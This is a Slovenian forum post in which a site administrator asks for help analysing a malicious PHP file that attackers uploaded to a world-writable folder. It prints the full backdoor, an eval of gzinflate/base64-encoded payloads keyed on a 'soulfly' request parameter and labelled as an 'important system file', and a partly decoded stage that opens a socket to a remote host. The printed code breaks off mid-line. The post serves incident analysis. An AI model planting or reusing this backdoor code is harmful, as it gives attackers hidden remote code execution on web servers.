hekerska uganka

8 naročnikov

Zdravo,
shakali so en site, nekak jim je uspelo uploadat en php file v neko 777 mapo.
Preko tega fajla so verjetno lahko brskali po celem www direktoriu in spreminjali vse kar je bilo 777. Škode sicer niso naredili in iz backupov sem že obnovil zadeve in luknjo zavaroval, vendar vseeno
Vsebina zlobnega fajla je takšna:

<?php
// Important system file. Don't change anything.
if(@$_REQUEST['soulfly']=='1'){eval(gzinflate(base64_decode('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')));}else{eval(gzinflate(base64_decode('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')));}
?>

tole sem ročno n-krat dekodiral do te faze:

<?php
error_reporting(0);
set_time_limit(0);
@set_magic_quotes_runtime(0);
if(SSSSS())exit;
function SSSSS(){$SSSSS=SSSSSSS("AwA=");
$SSSSSS=@$_REQUEST[SSSSSSS("q0jLAwA=")];
if($SSSSSS){$SSSSS=$SSSSSS;
}elseif($SSSSSSS=trim(@$_REQUEST[SSSSSSS("KwQA")])){$SSSSS=SSSSSSS("K05NLErO0CvIKLAvtAUA").urlencode($SSSSSSS).SSSSSSS("U6vILLAFAA==").urlencode($_SERVER[SSSSSSS("C3L19Q9xjXd0cQkCAA==")]);
}if($SSSSS){if(($SSSSSSSS=SSSSSS(SSSSSSS("K83LLCxNLSlKTM5OLdJLyQIA"),$SSSSS))!==false){echo $SSSSSSSS;
return true;
}}return false;
}function SSSSSS($SSSSS,$SSSSSS){$SSSSSSS=SSSSSSS("AwA=");
if($SSSSSSSS=@fsockopen($SSSSS,80,$SSSSSSSSS,$SSSSSSSSSS,15)){$SSSSSSSSSSS=eval("return \"".SSSSSSS("iymKyQMA")."\";
");
if(!@fwrite($SSSSSSSS,eval("return \"".SSSSSSS("c3cNUdAHAA==")."\";
").$SSSSSS.eval("return \"".SSSSSSS("U/AICQnQN9QzAAA=")."\";
